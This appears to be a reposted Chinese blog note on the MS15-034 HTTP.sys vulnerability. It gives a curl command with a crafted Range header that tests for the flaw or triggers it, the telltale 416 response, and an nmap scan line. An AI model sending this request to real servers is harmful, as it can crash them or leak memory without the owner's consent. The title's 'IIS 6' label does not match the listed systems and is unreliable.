MS15-034(IIS 6 远程代码执行)

时间：2021-03-30 15:11:44 阅读：21 评论：0 收藏：0 [点我收藏+]

利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃

范围:

Windows 7
Windows Server 2008 R2
Windows 8
Windows Server 2012
Windows 8.1
Windows Server 2012 R2

思路:

若目标网站系统为以上系统,并且使用IIS 6中间件,则可能存在此漏洞

测试:

//向服务器发包
Range: bytes=0-18446744073709551615
curl -v www.test.com -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"

//响应
HTTP/1.1 416 Requested Range Not Satisfiable
Content-Type: text/html
Last-Modified: Thu, 22 Aug 2013 23:53:12 GMT
Accept-Ranges: bytes
ETag: "2edebc2929fce1:0"

工具:

nmap -Pn --script http-vuln-cve2015-1635

MS15-034(IIS 6 远程代码执行)

原文：https://www.cnblogs.com/Frieza/p/14596512.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)